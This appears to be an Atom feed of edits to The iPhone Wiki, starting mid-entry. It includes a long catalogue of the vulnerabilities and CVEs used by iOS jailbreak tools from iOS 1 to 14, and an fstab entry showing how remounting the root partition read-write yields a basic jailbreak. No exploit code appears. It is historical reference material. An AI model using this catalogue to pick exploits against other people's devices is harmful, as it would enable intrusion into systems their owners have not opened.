===[[checkra1n]] (14.0 - 14.6 beta)===&lt;br /&gt;
&lt;br /&gt;
* [[Checkm8_Exploit | checkm8]] ({{cve|2019-8900}})&lt;br /&gt;
&lt;br /&gt;
===[[unc0ver]] (14.0 - 14.3)===&lt;br /&gt;
&lt;br /&gt;
* ivac entry use-after-free ({{cve|2021-1782}})&lt;/div&gt;</summary>
		<author><name>Inflatable Man</name></author>
		
	</entry>
	<entry>
		<id>https://www.theiphonewiki.com/w/index.php?title=Android&amp;diff=112756</id>
		<title>Android</title>
		<link rel="alternate" type="text/html" href="https://www.theiphonewiki.com/w/index.php?title=Android&amp;diff=112756"/>
		<updated>2021-04-30T02:25:39Z</updated>

		<summary type="html">&lt;p&gt;Inflatable Man: /* Links */ Added Project Sandcastle as a link.&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;[[Image:Android_logo.png|150px|right]]&lt;br /&gt;
== Links ==&lt;br /&gt;
=== iDroid Resources ===&lt;br /&gt;
*[http://www.idroidproject.org/wiki/Main_Page iDroid Project]&lt;br /&gt;
*[[iPhoneLinux]]&lt;br /&gt;
*[http://www.idroidproject.org/wiki/Frequently_Asked_Questions iPhoneLinux FAQ]&lt;br /&gt;
*[http://www.idroidproject.org/wiki/Installing_iDroid Installing iDroid]&lt;br /&gt;
=== Project Sandcastle ===&lt;br /&gt;
*[https://projectsandcastle.org Project Sandcastle]&lt;br /&gt;
=== Related Information ===&lt;br /&gt;
*[[Jailbreaking]]&lt;br /&gt;
*[[PwnageTool]]&lt;br /&gt;
*[[Sn0wbreeze]]&lt;br /&gt;
*[[WinPwn]]&lt;br /&gt;
*[[OpeniBoot]]&lt;br /&gt;
=== Helping Out ===&lt;br /&gt;
*[http://www.idroidproject.org/wiki/ToDo iPhoneLinux To-Do]&lt;br /&gt;
*[[Porting OpeniBoot]]&lt;br /&gt;
*[http://www.idroidproject.org/wiki/Frequently_Asked_Questions iPhoneLinux FAQ]&lt;br /&gt;
*[http://www.idroidproject.org/wiki/ToDo iPhoneLinux To-Do]&lt;br /&gt;
*[http://www.idroidproject.org/wiki/Installing_iDroid Installing iDroid]&lt;br /&gt;
&lt;br /&gt;
== See Also ==&lt;br /&gt;
* [[iDroid]]&lt;br /&gt;
&lt;br /&gt;
[[Category:Android on iPhone]]&lt;/div&gt;</summary>
		<author><name>Inflatable Man</name></author>
		
	</entry>
	<entry>
		<id>https://www.theiphonewiki.com/w/index.php?title=Cmw&amp;diff=112755</id>
		<title>Cmw</title>
		<link rel="alternate" type="text/html" href="https://www.theiphonewiki.com/w/index.php?title=Cmw&amp;diff=112755"/>
		<updated>2021-04-30T02:22:13Z</updated>

		<summary type="html">&lt;p&gt;Inflatable Man: Added that Chris Wade no longer works on iEmu and now works on Corellium.&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;{{lowercase}}&lt;br /&gt;
Chris Wade (aka cmw or Niacin) is the creator of [[WinPwn]] and the first to use the [[LibTiff]] exploit to [[jailbreak]] the iPhone 1.1.1 OS. He worked on [[iEmu]], an [[iOS]] emulator. He is currently working on Corellium, a program that can virtualize ARM devices.&lt;br /&gt;
&lt;br /&gt;
=== Links ===&lt;br /&gt;
*[http://twitter.com/cmwdotme  Twitter]&lt;br /&gt;
*[https://github.com/cmwdotme Github]&lt;br /&gt;
*[http://www.cmw.me Homepage]&lt;br /&gt;
&lt;br /&gt;
[[Category:Hackers]]&lt;/div&gt;</summary>
		<author><name>Inflatable Man</name></author>
		
	</entry>
	<entry>
		<id>https://www.theiphonewiki.com/w/index.php?title=/private/etc/fstab&amp;diff=112333</id>
		<title>/private/etc/fstab</title>
		<link rel="alternate" type="text/html" href="https://www.theiphonewiki.com/w/index.php?title=/private/etc/fstab&amp;diff=112333"/>
		<updated>2021-04-25T18:29:38Z</updated>

		<summary type="html">&lt;p&gt;Inflatable Man: Added that fstab was removed in iOS 14.&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;fstab controls the read/write access of the root and media partitions. A barebones jailbreak can be put in place simply by modifying this file to grant full read/write access to the [[/|root partition]] ([[/dev/disk0s1s1]]). fstab was removed in iOS 14.&lt;br /&gt;
&lt;br /&gt;
== File Contents ==&lt;br /&gt;
Note the empty line. This is required for the file to be parsed correctly.&lt;br /&gt;
=== Before [[jailbreak]] ===&lt;br /&gt;
 [[/dev/disk0s1s1]] / hfs ro 0 1&lt;br /&gt;
 [[/dev/disk0s1s2]] /private/var hfs,nosuid,nodev rw 0 2&lt;br /&gt;
 &lt;br /&gt;
=== After jailbreak ===&lt;br /&gt;
 /dev/disk0s1s1 / hfs rw 0 1&lt;br /&gt;
 /dev/disk0s1s2 /private/var hfs,nosuid,nodev rw 0 2&lt;br /&gt;
 &lt;br /&gt;
== Parents ==&lt;br /&gt;
{{parent|private|etc}}&lt;br /&gt;
&lt;br /&gt;
[[Category:Ramdisk Patches]]&lt;/div&gt;</summary>
		<author><name>Inflatable Man</name></author>
		
	</entry>
	<entry>
		<id>https://www.theiphonewiki.com/w/index.php?title=Jailbreak_Exploits&amp;diff=112120</id>
		<title>Jailbreak Exploits</title>
		<link rel="alternate" type="text/html" href="https://www.theiphonewiki.com/w/index.php?title=Jailbreak_Exploits&amp;diff=112120"/>
		<updated>2021-04-17T23:38:45Z</updated>

		<summary type="html">&lt;p&gt;Inflatable Man: /* evasi0n (6.0 / 6.0.1 / 6.0.2 / 6.1 / 6.1.1 / 6.1.2) */ Fix CVE (according to https://www.theiphonewiki.com/wiki/Timezone_Vulnerability and https://support.apple.com/en-us/HT202706)&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;This page lists the '''exploits''' used in [[jailbreak]]s.&lt;br /&gt;
&lt;br /&gt;
== Common exploits ==&lt;br /&gt;
These exploits are not dependent on any firmware; as such, they are used in numerous jailbreaking programs.&lt;br /&gt;
&lt;br /&gt;
* [[Pwnage]] + [[Pwnage 2.0]] (together to jailbreak the [[M68AP|iPhone]], [[N45AP|iPod touch]], and [[N82AP|iPhone 3G]])&lt;br /&gt;
* [[ARM7 Go]] (from iOS 2.1.1) (for [[tethered jailbreak]] on [[N72AP|iPod touch (2nd generation)]])&lt;br /&gt;
* [[0x24000 Segment Overflow]] (for [[untethered jailbreak]] on [[N88AP|iPhone 3GS]] with [[Bootrom 359.3|old bootrom]] and [[N72AP|iPod touch (2nd generation)]] with [[Bootrom 240.4|old bootrom]]; another exploit as the [[limera1n Exploit]] is required)&lt;br /&gt;
* [[limera1n Exploit]] (for [[tethered jailbreak]] on [[N88AP|iPhone 3GS]], [[N18AP|iPod touch (3rd generation)]], [[K48AP|iPad]], [[iPhone 4]], [[N81AP|iPod touch (4th generation)]] and [[K66AP|Apple TV (2nd generation)]])&lt;br /&gt;
* [[usb_control_msg(0xA1, 1) Exploit]] (also known as &amp;quot;steaks4uce&amp;quot;) (for [[tethered jailbreak]] on [[N72AP|iPod touch (2nd generation)]])&lt;br /&gt;
&lt;br /&gt;
== Jailbreak Programs ==&lt;br /&gt;
=== [[PwnageTool]] (2.0 - 5.1.1) ===&lt;br /&gt;
* uses different common exploits&lt;br /&gt;
* uses the exploits listed below to untether up to iOS 5.1.1&lt;br /&gt;
&lt;br /&gt;
=== [[redsn0w]] (3.0 - 6.0) ===&lt;br /&gt;
* uses different common exploits&lt;br /&gt;
* uses the same exploits as [[Absinthe|Absinthe]] and [[Absinthe|Absinthe 2.0]] to jailbreak iOS 5.0/5.0.1 and 5.1.1&lt;br /&gt;
* uses the exploits listed below to untether up to iOS 5.1.1&lt;br /&gt;
&lt;br /&gt;
=== [[sn0wbreeze]] (3.1.3 - 6.1.3) ===&lt;br /&gt;
* uses different common exploits&lt;br /&gt;
* uses the exploits listed below to untether up to iOS 6.1.2&lt;br /&gt;
&lt;br /&gt;
== Programs used to jailbreak 1.x ==&lt;br /&gt;
=== [[AppTapp Installer]] (1.0 / 1.0.1 / 1.0.2) ===&lt;br /&gt;
* iBoot &amp;lt;code&amp;gt;cp&amp;lt;/code&amp;gt;-command exploit&lt;br /&gt;
&lt;br /&gt;
=== [[iBrickr]] (1.0 / 1.0.1 / 1.0.2) ===&lt;br /&gt;
* iBoot &amp;lt;code&amp;gt;cp&amp;lt;/code&amp;gt;-command exploit&lt;br /&gt;
&lt;br /&gt;
=== [[AppSnapp]]/[[JailbreakMe|JailbreakMe 1.0]] (1.0 / 1.0.1 / 1.0.2 / 1.1.1) ===&lt;br /&gt;
* [[LibTiff|libtiff exploit]] (Adapted from the PSP scene, used by [[JailbreakMe]]) ({{cve|2006-3459}})&lt;br /&gt;
&lt;br /&gt;
=== [[mknod|OktoPrep]] (1.1.2) ===&lt;br /&gt;
&amp;quot;Upgrade&amp;quot; to 1.1.2 from a jailbroken 1.1.1&lt;br /&gt;
* [[mknod]]&lt;br /&gt;
&lt;br /&gt;
=== [[Soft Upgrade]] (1.1.3) ===&lt;br /&gt;
&amp;quot;Upgrade&amp;quot; to 1.1.3 from a running jailbroken 1.1.2&lt;br /&gt;
&lt;br /&gt;
=== [[ZiPhone]] (1.1.3 / 1.1.4 / 1.1.5) ===&lt;br /&gt;
* [[Ramdisk Hack]]&lt;br /&gt;
&lt;br /&gt;
=== [[iLiberty+|iLiberty / iLiberty+]] (1.1.3 / 1.1.4 / 1.1.5) ===&lt;br /&gt;
&lt;br /&gt;
== Programs used to jailbreak 2.x ==&lt;br /&gt;
=== [[QuickPwn]] (2.0 - 2.2.1) ===&lt;br /&gt;
* uses [[Pwnage]] and [[Pwnage 2.0]]&lt;br /&gt;
&lt;br /&gt;
=== [[Redsn0w Lite]] (2.1.1) ===&lt;br /&gt;
* [[ARM7 Go]] (for [[N72AP|iPod touch (2nd generation)]] only)&lt;br /&gt;
&lt;br /&gt;
== Programs used to jailbreak 3.x ==&lt;br /&gt;
=== [[purplera1n]] (3.0) ===&lt;br /&gt;
* [[iBoot Environment Variable Overflow]] ({{cve|2009-2795}})&lt;br /&gt;
* uses [[0x24000 Segment Overflow]]&lt;br /&gt;
&lt;br /&gt;
=== [[blackra1n]] (3.1 / 3.1.1 / 3.1.2) ===&lt;br /&gt;
* [[usb_control_msg(0x21, 2) Exploit]] ({{cve|2010-0038}})&lt;br /&gt;
* uses [[0x24000 Segment Overflow]]&lt;br /&gt;
&lt;br /&gt;
=== [[Spirit]] (3.1.2 / 3.1.3 / 3.2) ===&lt;br /&gt;
* [[MobileBackup Copy Exploit]]&lt;br /&gt;
* [[Incomplete Codesign Exploit]]&lt;br /&gt;
* [[BPF_STX Kernel Write Exploit]]&lt;br /&gt;
&lt;br /&gt;
=== [[Star|JailbreakMe 2.0 / Star]] (3.1.2 / 3.1.3 / 3.2 / 3.2.1) ===&lt;br /&gt;
* [[Malformed CFF Vulnerability]] ({{cve|2010-1797}})&lt;br /&gt;
* [[Incomplete Codesign Exploit]]&lt;br /&gt;
* [[IOSurface Kernel Exploit]] ({{cve|2010-2973}})&lt;br /&gt;
&lt;br /&gt;
=== [[limera1n]] / [[greenpois0n (jailbreak)|greenpois0n]] (3.2.2) ===&lt;br /&gt;
* uses different common exploits&lt;br /&gt;
* [[Packet Filter Kernel Exploit]]&lt;br /&gt;
&lt;br /&gt;
== Programs used to jailbreak 4.x ==&lt;br /&gt;
=== [[Star|JailbreakMe 2.0 / Star]] (4.0 / 4.0.1) ===&lt;br /&gt;
* [[Malformed CFF Vulnerability]] ({{cve|2010-1797}})&lt;br /&gt;
* [[Incomplete Codesign Exploit]]&lt;br /&gt;
* [[IOSurface Kernel Exploit]] ({{cve|2010-2973}})&lt;br /&gt;
&lt;br /&gt;
=== [[limera1n]] (4.0 / 4.0.1 / 4.0.2 / 4.1) ===&lt;br /&gt;
* uses different common exploits&lt;br /&gt;
* [[Packet Filter Kernel Exploit]]&lt;br /&gt;
&lt;br /&gt;
=== [[greenpois0n (jailbreak)|greenpois0n]] (4.1) ===&lt;br /&gt;
* uses different common exploits&lt;br /&gt;
* [[Packet Filter Kernel Exploit]]&lt;br /&gt;
&lt;br /&gt;
=== [[greenpois0n (jailbreak)|greenpois0n]] (4.2.1) ===&lt;br /&gt;
* uses different common exploits&lt;br /&gt;
* [[HFS Legacy Volume Name Stack Buffer Overflow]]&lt;br /&gt;
&lt;br /&gt;
=== [[Saffron|JailbreakMe 3.0 / Saffron]] (4.2.6 / 4.2.7 / 4.2.8) ===&lt;br /&gt;
* [[T1 Font Integer Overflow]] ({{cve|2011-0226}})&lt;br /&gt;
* [[HFS Legacy Volume Name Stack Buffer Overflow]]&lt;br /&gt;
&lt;br /&gt;
=== [[unthredeh4il]] (4.2.6 - 4.2.10) ===&lt;br /&gt;
Except for the [[iPad (3rd generation)]]&lt;br /&gt;
* MobileBackup2 Copy Exploit&lt;br /&gt;
* a new Packet Filter Kernel Exploit ({{cve|2012-3728}})&lt;br /&gt;
* [[AMFID code signing evasion]] ({{cve|2013-0977}})&lt;br /&gt;
* [[launchd.conf untether]]&lt;br /&gt;
* [[Timezone Vulnerability]]&lt;br /&gt;
&lt;br /&gt;
=== [[Saffron|JailbreakMe 3.0 / Saffron]] (4.3 / 4.3.1 / 4.3.2 / 4.3.3) ===&lt;br /&gt;
Except for the [[N18AP|iPod touch (3rd generation)]] on iOS 4.3.1.&lt;br /&gt;
* [[T1 Font Integer Overflow]] ({{cve|2011-0226}})&lt;br /&gt;
* [[IOMobileFrameBuffer Privilege Escalation Exploit]] ({{cve|2011-0227}})&lt;br /&gt;
&lt;br /&gt;
=== i0nic's Untether (4.3.1 / 4.3.2 / 4.3.3) ===&lt;br /&gt;
used in [[redsn0w]] to untether iOS 4.3.1 / 4.3.2 / 4.3.3&lt;br /&gt;
* [[ndrv_setspec() Integer Overflow]]&lt;br /&gt;
&lt;br /&gt;
=== [[unthredeh4il]] (4.3 - 4.3.5) ===&lt;br /&gt;
Except for the [[iPad (3rd generation)]]&lt;br /&gt;
* MobileBackup2 Copy Exploit&lt;br /&gt;
* a new Packet Filter Kernel Exploit ({{cve|2012-3728}})&lt;br /&gt;
* [[AMFID code signing evasion]] ({{cve|2013-0977}})&lt;br /&gt;
* [[launchd.conf untether]]&lt;br /&gt;
* [[Timezone Vulnerability]]&lt;br /&gt;
&lt;br /&gt;
== Programs used to jailbreak 5.x ==&lt;br /&gt;
&lt;br /&gt;
=== [[Absinthe]] (5.0 on [[N94AP|iPhone 4S]] only / 5.0.1 on [[iPad 2]] and [[iPhone 4S]])  ===&lt;br /&gt;
* [[Racoon String Format Overflow Exploit]] ({{cve|2012-0646}}) (used both for payload injection and untether)&lt;br /&gt;
* [[HFS Heap Overflow]] ({{cve|2012-0642}})&lt;br /&gt;
* unknown exploit ({{cve|2012-0643}})&lt;br /&gt;
&lt;br /&gt;
=== [[Corona|Corona Untether]] (5.0.1)  ===&lt;br /&gt;
* [[Racoon String Format Overflow Exploit]] ({{cve|2012-0646}})&lt;br /&gt;
* [[HFS Heap Overflow]] ({{cve|2012-0642}})&lt;br /&gt;
* unknown exploit ({{cve|2012-0643}})&lt;br /&gt;
&lt;br /&gt;
=== [[Absinthe|Absinthe 2.0]] and [[Rocky Racoon|Rocky Racoon Untether]] (5.1.1) ===&lt;br /&gt;
* a new Packet Filter Kernel Exploit ({{cve|2012-3728}})&lt;br /&gt;
* Racoon DNS4/WINS4 table buffer overflow ({{cve|2012-3727}})&lt;br /&gt;
* MobileBackup2 Copy Exploit&lt;br /&gt;
&lt;br /&gt;
=== [[unthredeh4il]] (5.0-5.1.1) ===&lt;br /&gt;
Except for the [[iPad (3rd generation)]]&lt;br /&gt;
* MobileBackup2 Copy Exploit&lt;br /&gt;
* a new Packet Filter Kernel Exploit ({{cve|2012-3728}})&lt;br /&gt;
* [[AMFID code signing evasion]] ({{cve|2013-0977}})&lt;br /&gt;
* [[launchd.conf untether]]&lt;br /&gt;
* [[Timezone Vulnerability]]&lt;br /&gt;
&lt;br /&gt;
== Programs used to jailbreak 6.x ==&lt;br /&gt;
=== [[evasi0n]] (6.0 / 6.0.1 / 6.0.2 / 6.1 / 6.1.1 / 6.1.2)  ===&lt;br /&gt;
* [[Symbolic Link Vulnerability]]&lt;br /&gt;
* [[Timezone Vulnerability]] ({{cve|2013-0979}})&lt;br /&gt;
* [[Shebang Trick]] ({{cve|2013-5154}})&lt;br /&gt;
* [[AMFID code signing evasion]]&lt;br /&gt;
* [[launchd.conf untether]]&lt;br /&gt;
* [[IOUSBDeviceFamily Vulnerability]] ({{cve|2013-0981}})&lt;br /&gt;
* [[ARM Exception Vector Info Leak]] ({{cve|2013-0978}})&lt;br /&gt;
* [[dynamic memmove() locating]]&lt;br /&gt;
* [[vm_map_copy_t corruption for arbitrary memory disclosure]]&lt;br /&gt;
* [[kernel memory write via ROP gadget]]&lt;br /&gt;
* [[Overlapping Segment Attack]] ({{cve|2013-0977}})&lt;br /&gt;
&lt;br /&gt;
=== [[p0sixspwn]] (6.1.3 / 6.1.4 / 6.1.5 / 6.1.6) ===&lt;br /&gt;
* [[posix_spawn kernel information leak]] ({{cve|2013-3954}}) (by [[i0n1c]])&lt;br /&gt;
* [[posix_spawn kernel exploit]] ({{cve|2013-3954}}) (by [[i0n1c]])&lt;br /&gt;
* [[mach_msg_ool_descriptor_ts for heap shaping]] ({{cve|2013-3953}})&lt;br /&gt;
* [[AMFID_code_signing_evasi0n7]] ({{cve|2014-1273}})&lt;br /&gt;
* [[DeveloperDiskImage race condition]] (by [[comex]])&lt;br /&gt;
* [[launchd.conf untether]]&lt;br /&gt;
&lt;br /&gt;
== Programs used to jailbreak 7.x ==&lt;br /&gt;
=== [[evasi0n7]] (7.0 / 7.0.1 / 7.0.2 / 7.0.3 / 7.0.4 / 7.0.5 / 7.0.6) ===&lt;br /&gt;
{{Section Stub}}&lt;br /&gt;
* [[Symbolic Link Vulnerability]] ({{cve|2013-5133}})&lt;br /&gt;
* [[AMFID_code_signing_evasi0n7]] ({{cve|2014-1273}})&lt;br /&gt;
* CrashHouseKeeping chmod vulnerability ({{cve|2014-1272}})&lt;br /&gt;
* ptmx_get_ioctl ioctl crafted call ({{cve|2014-1278}})&lt;br /&gt;
&lt;br /&gt;
=== [[Geeksn0w]] (7.1 / 7.1.1) ===&lt;br /&gt;
* [[limera1n]]'s bootrom exploit ([[Tethered jailbreak]]) on [[iPhone 4]]&lt;br /&gt;
&lt;br /&gt;
=== [[Pangu]] (7.1 / 7.1.1 / 7.1.2) ===&lt;br /&gt;
* Mach-O OSBundleHeaders info leak ({{cve|2014-4491}}) (Pangu v1.0.0)&lt;br /&gt;
* AppleKeyStore::initUserClient info leak ({{cve|2014-4407}}) (Pangu &amp;gt;v1.0.0)&lt;br /&gt;
* break_early_random (by [[i0n1c]] and Tarjei Mandt of Azimuth) ({{cve|2014-4422}})&lt;br /&gt;
* mach_port_kobject exploit {{cve|2014-4496}} - used to recover the permutation value and addresses of kernel objects&lt;br /&gt;
* IOSharedDataQueue notification port overwrite ({{cve|2014-4461}})&lt;br /&gt;
* &amp;quot;syslogd chown&amp;quot; vulnerability&lt;br /&gt;
* enterprise certificate (no real exploit, used for initial &amp;quot;unsigned&amp;quot; code execution)&lt;br /&gt;
* &amp;quot;foo_extracted&amp;quot; symlink vulnerability (used to write to /var) ({{cve|2014-4386}})&lt;br /&gt;
* /tmp/bigfile (a big file for improvement of the reliability of a race condition)&lt;br /&gt;
* VoIP backgrounding trick (used to auto restart the app)&lt;br /&gt;
* hidden segment attack&lt;br /&gt;
&lt;br /&gt;
== Programs used to jailbreak 8.x ==&lt;br /&gt;
=== [[Pangu8]] (8.0 / 8.0.1 / 8.0.2 / 8.1) ===&lt;br /&gt;
* an exploit for a bug in /usr/libexec/neagent (source @iH8sn0w)&lt;br /&gt;
* enterprise certificate (inside the IPA)&lt;br /&gt;
* a kind of dylib injection into a system process (see IPA)&lt;br /&gt;
* a dmg mount command (looks like the Developer DMG) (syslog while jailbreaking)&lt;br /&gt;
* a sandboxing problem in debugserver ({{cve|2014-4457}})&lt;br /&gt;
* mach_port_kobject exploit {{cve|2014-4496}} - used to recover the permutation value and addresses of kernel objects&lt;br /&gt;
* the same kernel exploit as used in [[Pangu|the first Pangu]] ({{cve|2014-4461}}) (source @iH8sn0w) - now used to also leak kernel memory (source @Morpheus______)&lt;br /&gt;
* enable-dylibs-to-override-cache&lt;br /&gt;
* a new ovelapping segment attack ({{cve|2014-4455}})&lt;br /&gt;
&lt;br /&gt;
=== [[TaiG]] and [[PPJailbreak]] (8.0 / 8.0.1 / 8.0.2 / 8.1 / 8.1.1 / 8.1.2) ===&lt;br /&gt;
(See also details at [http://newosxbook.com/articles/TaiG.html newosxbook.com])&lt;br /&gt;
* A new AFC symlink attack ({{cve|2014-4480}}) - to get onto the device filesystem&lt;br /&gt;
* [[DeveloperDiskImage race condition]] (by [[comex]], also used in p0sixspwn) - to mount a fake DDI and instantly overwrite (via union) libmis/xpcd_cache&lt;br /&gt;
* A new overlapping segment attack [in a modified version], dyld, ({{cve|2014-4455}}) - negative LC_SEGMENT - to allow libmis and xpcdcache to load&lt;br /&gt;
* libmis redirection of MISValidateSignature (as per evasion) to kCFEqual, with overlapping segment variant on TaiG (Segment at end of file, negative)&lt;br /&gt;
* enable-dylibs-to-override-cache - force loading of dynamic libraries from filesystem (where available) instead of the shared cache (overriding libmis/xpcd_cache)&lt;br /&gt;
* MobileStorageMounter exploit ({{cve|2015-1062}})&lt;br /&gt;
* Backup exploit used to access restricted parts of the filesystem ({{cve|2015-1087}})&lt;br /&gt;
&lt;br /&gt;
Kernel:&lt;br /&gt;
&lt;br /&gt;
* Mach-O OSBundleHeaders info leak ({{cve|2014-4491}}) - leaks slid addresses&lt;br /&gt;
* mach_port_kobject exploit {{cve|2014-4496}} - used to recover the permutation value and addresses of kernel objects&lt;br /&gt;
* IOHIDFamily Kernel exploit ({{cve|2014-4487}}) - to overwrite memory&lt;br /&gt;
&lt;br /&gt;
=== [[TaiG]] and [[PPJailbreak]] (8.1.3 / 8.2 / 8.3 / 8.4) ===&lt;br /&gt;
(See also details at http://newosxbook.com/articles/28DaysLater.html and http://newosxbook.com/articles/HIDeAndSeek.html)&lt;br /&gt;
* [[DeveloperDiskImage race condition]] (also used in TaiG for 8.0-8.1.2 but modified) - to mount a fake DDI&lt;br /&gt;
* enable-dylibs-to-override-cache - force loading of dynamic libraries from filesystem (where available) instead of the shared cache (overriding libmis)&lt;br /&gt;
* Symbolic linking to AFC ({{cve|2015-5746}})&lt;br /&gt;
* Backup exploit to write to protected regions of the disk ({{cve|2015-5752}})&lt;br /&gt;
* Code signing exploit ({{cve|2015-3802}})&lt;br /&gt;
* Code signing exploit ({{cve|2015-3803}})&lt;br /&gt;
* Code signing exploit ({{cve|2015-3805}})&lt;br /&gt;
* Code signing exploit ({{cve|2015-3806}})&lt;br /&gt;
* IOHIDFamily exploit ({{cve|2015-5774}})&lt;br /&gt;
* Air Traffic exploit to allow attackers to access arbitrary filesystem locations via vectors related to asset handling ({{cve|2015-5766}})&lt;br /&gt;
&lt;br /&gt;
=== [[EtasonJB]] and [[Home Depot]] (8.4.1) === &lt;br /&gt;
&lt;br /&gt;
* OSUnserialize Information leak ({{cve|2016-4655}})&lt;br /&gt;
* Kernel exploit ({{cve|2016-4656}})&lt;br /&gt;
&lt;br /&gt;
== Programs used to jailbreak 9.x ==&lt;br /&gt;
=== [[Pangu9]] (9.0 / 9.0.1 / 9.0.2 / 9.1) ===&lt;br /&gt;
* Photos exploit to gain arbitrary unsandboxed file system access as mobile to load outdated DDI. ({{cve|2015-7037}})&lt;br /&gt;
* MobileStorageMounter allowed older DeveloperDiskImages to be mounted, resulting in unsandboxed unsigned code execution due to known weaknesses in entitled executables.  ({{cve|2015-7051}})&lt;br /&gt;
* IOHIDFamily Use-After-Free for kernel information leak / code execution as mobile. ({{cve|2015-6974}})&lt;br /&gt;
* dyld exploit in dyld shared cache handling to override MISValidateSignature in libmis.dylib for persistency ({{cve|2015-7079}})&lt;br /&gt;
* Racing KPP for some of the patches.&lt;br /&gt;
* AMFI MAC Hooks were in non-__const __DATA section, so wouldn't be integrity checked by KPP, allowing to replace MAC hooks required for code-signing. ({{cve|2015-7055}})&lt;br /&gt;
&lt;br /&gt;
=== [[Pangu9]] (9.2 / 9.2.1 / 9.3 / 9.3.1 / 9.3.2 / 9.3.3) ===&lt;br /&gt;
* IOMobileFrameBuffer exploit to execute arbitrary code with kernel privileges. ({{cve|2016-4654}})&lt;br /&gt;
&lt;br /&gt;
=== [[jbme]] (9.2 / 9.2.1 / 9.3 / 9.3.1 / 9.3.2 / 9.3.3) ===&lt;br /&gt;
* Webkit exploit ({{cve|2016-4657}})&lt;br /&gt;
&lt;br /&gt;
=== [[Home Depot]] (9.1-9.3.4) === &lt;br /&gt;
* OSUnserialize Information leak ({{cve|2016-4655}})&lt;br /&gt;
* Kernel exploit ({{cve|2016-4656}})&lt;br /&gt;
&lt;br /&gt;
=== [[JailbreakMe 4.0]] (9.1-9.3.4) === &lt;br /&gt;
* OSUnserialize Information leak ({{cve|2016-4655}})&lt;br /&gt;
* Kernel exploit ({{cve|2016-4656}})&lt;br /&gt;
* Webkit exploit ({{cve|2016-4657}})&lt;br /&gt;
&lt;br /&gt;
=== [[Phœnix]] (9.3.5 / 9.3.6) === &lt;br /&gt;
* OSUnserialize Information leak ({{cve|2016-4655}})&lt;br /&gt;
* mach_port_register Kernel exploit ({{cve|2016-4669}})&lt;br /&gt;
&lt;br /&gt;
== Programs used to jailbreak 10.x ==&lt;br /&gt;
&lt;br /&gt;
=== [[extra_recipe+yaluX]] (10.0-10.1.1) ===&lt;br /&gt;
&lt;br /&gt;
* set_dp_control_port exploit to execute arbitrary code with kernel privileges. ({{cve|2016-7644}})&lt;br /&gt;
&lt;br /&gt;
=== [[yalu102]] (10.0.1-10.2) ===&lt;br /&gt;
&lt;br /&gt;
* mach_voucher_extract_attr_recipe_trap memory corruption. ({{cve|2017-2370}})&lt;br /&gt;
&lt;br /&gt;
=== [[doubleH3lix]] (10.0.1 - 10.3.3) ===&lt;br /&gt;
&lt;br /&gt;
* IOSurface Kernel Exploit ({{cve|2017-13861}})&lt;br /&gt;
&lt;br /&gt;
=== [[Meridian]] (10.0 - 10.3.3) ===&lt;br /&gt;
&lt;br /&gt;
* IOSurface Kernel Exploit ({{cve|2017-13861}})&lt;br /&gt;
&lt;br /&gt;
=== [[TotallyNotSpyware]] (10.0 - 10.3.3) ===&lt;br /&gt;
&lt;br /&gt;
* IOSurface Kernel Exploit ({{cve|2017-13861}})&lt;br /&gt;
* WebKit JIT optimization bug exploit ({{cve|2018-4233}})&lt;br /&gt;
&lt;br /&gt;
=== [[H3lix]] (10.0.1 - 10.3.4) ===&lt;br /&gt;
&lt;br /&gt;
* IOSurface Kernel Exploit ({{cve|2017-13861}})&lt;br /&gt;
&lt;br /&gt;
== Programs used to jailbreak 11.x ==&lt;br /&gt;
&lt;br /&gt;
===[[Unc0ver]] (11.0-11.4.1)===&lt;br /&gt;
&lt;br /&gt;
11.0 - 11.1.2 &lt;br /&gt;
&lt;br /&gt;
* IOSurface Kernel Exploit ({{cve|2017-13861}})&lt;br /&gt;
&lt;br /&gt;
11.0 - 11.3.1&lt;br /&gt;
&lt;br /&gt;
* mptcp_usr_connectx (multi_path) ({{cve|2018-4241}})&lt;br /&gt;
* getvolattrlist (empty_list) ({{cve|2018-4243}})&lt;br /&gt;
&lt;br /&gt;
11.0 - 11.4.1&lt;br /&gt;
&lt;br /&gt;
* voucher_swap ({{cve|2019-6225}}) &lt;br /&gt;
&lt;br /&gt;
===[[Electra]] (11.0-11.4.1)===&lt;br /&gt;
&lt;br /&gt;
11.0 - 11.1.2&lt;br /&gt;
&lt;br /&gt;
* IOSurface Kernel Exploit ({{cve|2017-13861}})&lt;br /&gt;
&lt;br /&gt;
11.2 - 11.3.1&lt;br /&gt;
&lt;br /&gt;
* mptcp_usr_connectx (multi_path) ({{cve|2018-4241}})&lt;br /&gt;
* getvolattrlist (empty_list) ({{cve|2018-4243}})&lt;br /&gt;
&lt;br /&gt;
11.2 - 11.4.1&lt;br /&gt;
&lt;br /&gt;
* v1ntex ({{cve|2019-6225}})&lt;br /&gt;
&lt;br /&gt;
== Programs used to jailbreak 12.x ==&lt;br /&gt;
&lt;br /&gt;
===[[Chimera]] (12.0 - 12.2 / 12.4)===&lt;br /&gt;
&lt;br /&gt;
12.0 - 12.1.2&lt;br /&gt;
&lt;br /&gt;
* voucher_swap ({{cve|2019-6225}}) &lt;br /&gt;
&lt;br /&gt;
12.0 - 12.2/12.4&lt;br /&gt;
&lt;br /&gt;
* SockPuppet ({{cve|2019-8605}})&lt;br /&gt;
&lt;br /&gt;
===[[Unc0ver]] (12.0 - 12.2 / 12.4 / 12.4.1 / 12.4.2 - 12.4.8)===&lt;br /&gt;
&lt;br /&gt;
12.0 - 12.1.2&lt;br /&gt;
&lt;br /&gt;
* voucher_swap ({{cve|2019-6225}}) &lt;br /&gt;
&lt;br /&gt;
12.0 - 12.2/12.4&lt;br /&gt;
&lt;br /&gt;
* SockPuppet ({{cve|2019-8605}})&lt;br /&gt;
&lt;br /&gt;
12.4.1&lt;br /&gt;
&lt;br /&gt;
* AppleAVE2Driver exploit ({{cve|2019-8795}})&lt;br /&gt;
* AppleSPUProfileDriver information leak ({{cve|2019-8794}})&lt;br /&gt;
&lt;br /&gt;
12.4.2 - 12.4.8&lt;br /&gt;
&lt;br /&gt;
* oob_timestamp ({{cve|2020-3837}})&lt;br /&gt;
* cuck00 information leak ({{cve|2020-3836}})&lt;br /&gt;
&lt;br /&gt;
===[[checkra1n]] (12.3 - 12.4.8)===&lt;br /&gt;
&lt;br /&gt;
* [[Checkm8_Exploit | checkm8]] ({{cve|2019-8900}})&lt;br /&gt;
&lt;br /&gt;
